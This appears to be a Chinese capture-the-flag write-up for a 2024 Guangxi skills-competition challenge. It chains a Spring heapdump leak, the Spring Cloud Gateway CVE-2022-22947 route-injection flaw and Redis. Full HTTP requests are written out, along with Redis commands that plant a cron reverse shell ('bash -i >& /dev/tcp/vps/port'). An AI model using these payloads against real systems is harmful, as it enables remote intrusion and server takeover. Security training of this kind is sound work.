2024年广西职工职业技能大赛-Spring

考点:

复制代码
1、spring 敏感文件泄露
2、Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947)
3、redis反弹shell

解题:

首先是heapdump泄露,读redis key得到

然后利用 Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947) 打redis就可以了

复制代码
POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/json

{
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/new_route/**"
      }
    }
  ],
  "filters": [
    {
      "name": "RewritePath",
      "args": {
        "_genkey_0": "/new_route(?<path>.*)",
        "_genkey_1": "/${path}"
      }
    }
  ],
  "uri": "http://127.0.0.1:6379/",
  "order": 0
}

POST /actuator/gateway/refresh HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/json

{
  "predicate": "Paths: [/new_route], match trailing slash: true",
  "route_id": "new_route",
  "filters": [
    "[[RewritePath /new_route(?<path>.*) = /${path}], order = 1]"
  ],
  "uri": "https://www.cnpanda.net",
  "order": 0
}

POST /new_route/xxx.xxx HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

auth P@ssw0rd
set xx "\n* * * * * bash -i >& /dev/tcp/vps/port 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

注意任务计划反弹shell方法仅适用于Centos

Ubuntu 不能用的原因如下:

因为默认 redis 写文件后是 644 权限,但是 Ubuntu 要求执行定时任务文件 /var/spool/cron/crontabs/<username> 权限必须是 600 才会执行,否则会报错 (root) INSECURE MODE (mode 0600 expected),而 Centos 的定时任务文件 /var/spool/cron/<username> 权限 644 也可以执行

因为 redis 保存 RDB 会存在乱码,在 Ubuntu 上会报错,而在 Centos 上不会报错

由于系统的不同,crontrab 定时文件位置也不同:

复制代码
Centos 的定时任务文件在 /var/spool/cron/<username>
Ubuntu 的定时任务文件在 /var/spool/cron/crontabs/<username>
相关推荐
Boop_wu15 分钟前
[Java EE] 多线程 -- 初阶(5) [线程池和定时器]
java·开发语言
optimistic_chen25 分钟前
【Java EE进阶 --- SpringBoot】Spring事务传播机制
spring boot·后端·spring·java-ee·事务·事务传播机制
雨中飘荡的记忆1 小时前
Java + Groovy计费引擎详解
java·groovy
嘟嘟w1 小时前
JVM(Java 虚拟机):核心原理、内存模型与调优实践
java·开发语言·jvm
合作小小程序员小小店1 小时前
web开发,在线%药店管理%系统,基于Idea,html,css,jQuery,java,ssm,mysql。
java·前端·mysql·jdk·html·intellij-idea
ZHE|张恒1 小时前
设计模式(八)组合模式 — 以树结构统一管理对象层级
java·设计模式·组合模式
TDengine (老段)1 小时前
TDengine 转换函数 CAST 用户手册
java·大数据·数据库·物联网·时序数据库·tdengine·涛思数据
爱吃土豆的马铃薯ㅤㅤㅤㅤㅤㅤㅤㅤㅤ2 小时前
java实现校验sql中,表字段在表里是否都存在,不存在的给删除掉
java·sql
编程火箭车2 小时前
【Java SE 基础学习打卡】15 分隔符、标识符与关键字
java·java入门·标识符·关键字·编程基础·分隔符·语法规则
灰色人生qwer2 小时前
idea teminal和 window cmd 输出java version不一致
java·ide·intellij-idea